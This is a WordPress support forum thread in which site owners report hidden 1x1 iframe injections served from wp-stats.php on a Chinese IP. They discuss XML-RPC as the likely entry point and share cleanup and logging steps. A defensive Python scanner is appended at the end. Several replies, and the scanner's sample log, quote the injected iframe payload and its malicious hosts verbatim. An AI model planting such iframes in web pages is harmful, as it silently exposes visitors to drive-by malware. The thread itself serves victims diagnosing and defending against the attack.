• Hi,

    I’ve searched around for a resolution to my problem but the closest thread I can find is this: https://www.remarpro.com/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page https://www.heroes-hype.com. The screen just freezes for about 10 minutes... sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for https://xx.xx.xx.xx./iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)... I also tried other themes and browsers, but a week later the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now I’m wondering whether anyone can corroborate that this is the likely reason... and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself... or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 15 replies - 31 through 45 (of 89 total)
  • I have found this code from a post dated the 1st Sept. still no word of a fix?

    One of my Blogs was injected in that way. I could figure it out in many ways:

    – there were many posts posted under administrator account over 3 months
    – also there were the mentioned iframe in many posts (IP as mentioned 61….)
    – and in existing posts (not admin) there were NOSCRIPT-tags with hidden URLS

    I was shocked at all as you can guess. WP version was the latest before 2.3.1. I updated now and made a complete new installation. I cannot import the posts because of the hacking things in it. I have to make that by hand.

    I don’t think you should close the trac-ticket for this issue!

    I searched around how to get my blog more secure. So I made everything possible for me from this paper “How to create a secure wordpress install” from BlogSecurity.net. I subscribed to this blog to keep me up to date what to do against such attacks.

    I hope WordPress will do more for security issues. But also I think we have to do more things to get it more secure for ourselves.

    No one has yet provided evidence that this is due to a problem in the current release, simply that they have posts which were altered at some point. This leads us to believe that you’re seeing the results of an exploitation in an older, vulnerable, install that you’ve simply not noticed until now.

    It’s not that the issue isn’t taken seriously, just that we’ve got nothing but anecdotal accounts to work on, which aren’t enough to reproduce this issue in the current release.

    Since I’m running my WordPress blog with strict XHTML served as application/xhtml+xml, and since the injected code isn’t valid XHTML, I wouldn’t’ve missed the breakage when upgrading WordPress if it was there, and I only have one configured WordPress instance on my server. I keep my WordPress install up-to-date with stable releases via svn.

    Unfortunately I don’t really have enough other than this to create a new ticket, but I’m fairly sure that this is the only WordPress install I have, and that the post was modified after upgrading to 2.3.1.

    pishmishy,

    Has nothing to do with old exploits, though the problem may have been around a while judging by some of the reports. I’ve had the problem turn up again in one of my blogs running 2.3.1. The problem has happened fairly recently, though I can’t pinpoint exactly when. Since I first noticed an injection I have checked my database from time to time to see if there have been any new injections. Nothing until now, some time after upgrading to 2.3.1.

    When I upgraded from 2.3 to 2.3.1 I took pains to make sure old files were not still lingering where they might cause problems. So the injection took place from the 2.3.1 code. I realize this information is not altogether helpful, but it’s all I can offer.

    I upgraded from 2.3.1 to 2.3.2 and I noticed my website was hanging; I found that one of my posts had the iframe connection to 61.132.75.71

    I’m not sure if this happened before or after the upgrade.

    Also, I installed a new theme, and I was going to make some changes to the code, and noticed some strange code in it. That’s when I started looking around to see if any sneaky code was in the theme. I was right, that certain line of code was in the sidebar, header, footer and so on. After getting the sneaky code out of my theme, I noticed my website kept hanging. I thought I still had some bad code; when I did a search on the IP it was trying to connect to, I found this thread about the iframe. Sure enough it was in a post about spyware I wrote some time ago.

    Same effect here. I upgraded everything to 2.3.2 and then noticed issues. The posts modified are older posts (nothing completely current, but stuff that was on the front page of the site) and in at least one case, I was able to confirm with Google cache that the injection had occurred before the 2.3.2 upgrade.

    The injection is 100% certainly via XMLRPC, because the posts are getting their character set maimed as well on the repost (they are using UTF-8, but I have some blogs set not to use it).

    I found this issue on a number of blogs over a number of databases with different usernames, passwords, db passwords, themes, layouts, and such. In some cases there were no additional users besides admin on the blog.

    I upgraded all of my blogs within hours of the 2.3.2 release (a ton of work, thanks) and I will be watching closely for any additional activity.

    It should be noted that Google does not like these frames, and it appears that they will pretty much remove your site from the SERPs if they find them on your pages.

    For what it’s worth, this happened to me as well.

    Sometime between 10-31-2007 and today. AVG alerted one of my users today who reported

    “AVG antivirus pops up two warnings: one for JS/Downloader Agent, and one for ‘Exploit.'”

    Also iframes, hosts (www.)wp-stats-php.info and 61.132.75.71, both serving up wp-stats.php. As soon as I did a whois on the domains and saw they were China, I knew something was afoot.

    I was either running wp version 2.2 OR 2.3.1, I simply can’t narrow everything down. Even if I knew when I upgraded to 2.3.1, I still don’t know when the attacker performed the SQL injection, or whatever it was.

    I used phpadmin to search the database for “wp-stats” and that located the troublesome posts.

    Is there any definitive answer yet as to how/why/only 2.2 was vulnerable, etc?

    Thanks

    I got it in 2.3.1 for sure.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    We need to know more about how they’re getting in. An exploit in WordPress is not the only way this sort of thing can happen.

    For example, if they ever gained read access to your wp-config.php file (and you didn’t notice and change the password), then they have your database info and can simply insert the content directly, no need to go through your website at all.

    Somebody needs to look through their server logs and find out just what’s happening when the content gets inserted. Email that information to [email protected] as well as posting it here.

    Hi! I found the same problem on my blog https://www.visoko.si/wp I’m running 2.2 WordPress with customized theme and on Hostgator account with Fantastico.
    Found two injections:

    <!-- Traffic Statistics --><iframe FRAMEBORDER="0" FRAMEBORDER="0" HEIGHT="1" WIDTH="1" SRC="https://www.wp-stats-php.info/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics -->

    and

    <!-- Traffic Statistics -->
    <iframe src=https://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    I’m checking with my shared hosting provider if I can get access to the mysql logs.

    In the interim, is there a way of determining when your particular wordpress installation was upgraded? Maybe looking at file dates? Or do database entries contain a version stamp of the WP that wrote it, etc?

    Thanks

    Otto42, I have seen how this is done, and it is pretty simple actually. The content appears to be changed during an edit started via xml-rpc. They are pulling the post, adding the code, and re-uploading the post back into place with the new code, all while NOT actually triggering an edit or update.

    There is no indication of direct connection to the database, which would be impossible anyway because my DBs are locked down and restricted to localhost access only. Thus the only way they can make the change is by executing code on the server.

    I have seen this on multiple blogs, each of which has different user and password combinations.

    This is a major issue. When Google sees this on your pages, your blog goes immediately into their VERY bad list for linking to a bad neighborhood, for installing trojans, and as such, you lose pretty much all your traffic in very short order.

    While my host was of very little help, I’ve taken a couple steps to help mitigate future problems.

    I’m now backing up the db much more frequently, so I can compare and get an exact date when something was changed.

    I started blocking China (amongst other countries) from my website wholesale via .htaccess.

    I made a minor change to wp-db.php that records each and every query to a separate file with date/time and IP address stamps. My blog is not that busy/popular, and although it’s generating relatively large logs, space is available and cheap. Mind you, this is just sort of outbound queries to the database NOT the results from the queries. I tested both posts and edit posts, and if WP is being used in the commission of the crime, then I’ll have an entry with some information. I’ve been grep’ing the logs for “iframe” and “wp-stats” which I think is a very good indication something funny is going on.

    thanks

    Keith, bad news for you: the guys doing this sort of thing use proxies and servers located in the US to cause the infection – the destination of the traffic is China (and then actually Russia… but that’s a longer story). So you can end up with these things all over your blog even if you have all of the Eastern Bloc and communist world blocked.

    If you are going to log queries, I would suggest only logging update and insert queries, to keep your log a little shorter. Otherwise you will end up with a huge log and it will be difficult to spot anything.
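As an added illustration (not code from anyone in this thread), the following Python script does two things discussed above: it scans post content for the 1x1 "Traffic Statistics" iframes in both the quoted and unquoted forms quoted earlier, and it filters a query log of the kind Keith's wp-db.php change would produce down to INSERT/UPDATE statements, flagging the ones that carry such an iframe. The log line layout (timestamp | client IP | SQL), the sample lines, and the function names are assumptions made for this example.

```python
import re

# Pull every <iframe ...> opening tag out of a post body, then parse its
# attributes. The attribute regex accepts both SRC="..." and src=... forms,
# matching the two injected variants quoted in this thread.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"?([^"\s>]+)')
# Markers reported in the thread for the injected frames.
KNOWN_MARKERS = ("wp-stats", "61.132.75.71", "wp-stats-php.info")


def find_hidden_iframes(html):
    """Return the src of every 1x1 iframe, or any iframe pointing at a known marker."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        tiny = attrs.get("width") == "1" and attrs.get("height") == "1"
        src = attrs.get("src", "")
        if tiny or any(m in src for m in KNOWN_MARKERS):
            hits.append(src)
    return hits


# Constructed query-log sample in the assumed "timestamp | ip | sql" layout.
# 10.0.0.5 and 192.0.2.9 are placeholder addresses; the iframe itself is the
# unquoted variant quoted in this thread.
QUERY_LOG = """\
2007-11-02 03:14:07 | 10.0.0.5 | SELECT * FROM wp_posts WHERE ID = 42
2007-11-02 03:14:09 | 10.0.0.5 | UPDATE wp_posts SET post_content = '<p>old text</p><iframe src=https://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>' WHERE ID = 42
2007-11-02 03:20:00 | 192.0.2.9 | INSERT INTO wp_options VALUES ('siteurl', 'https://example.invalid')
"""


def suspicious_writes(log_text):
    """Keep only INSERT/UPDATE queries (per the advice above) and return
    (timestamp, ip, iframe_src) for each one that writes a hidden iframe."""
    flagged = []
    for line in log_text.splitlines():
        parts = [p.strip() for p in line.split("|", 2)]
        if len(parts) != 3:
            continue  # blank or malformed line
        ts, ip, sql = parts
        if not sql.upper().startswith(("INSERT", "UPDATE")):
            continue
        for src in find_hidden_iframes(sql):
            flagged.append((ts, ip, src))
    return flagged
```

Run `suspicious_writes(QUERY_LOG)` to see the single UPDATE that carries the injected frame, along with the time and source address that wrote it; `find_hidden_iframes` can be applied directly to post_content dumped from phpMyAdmin.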

  • The topic ‘iframe injection problem?’ is closed to new replies.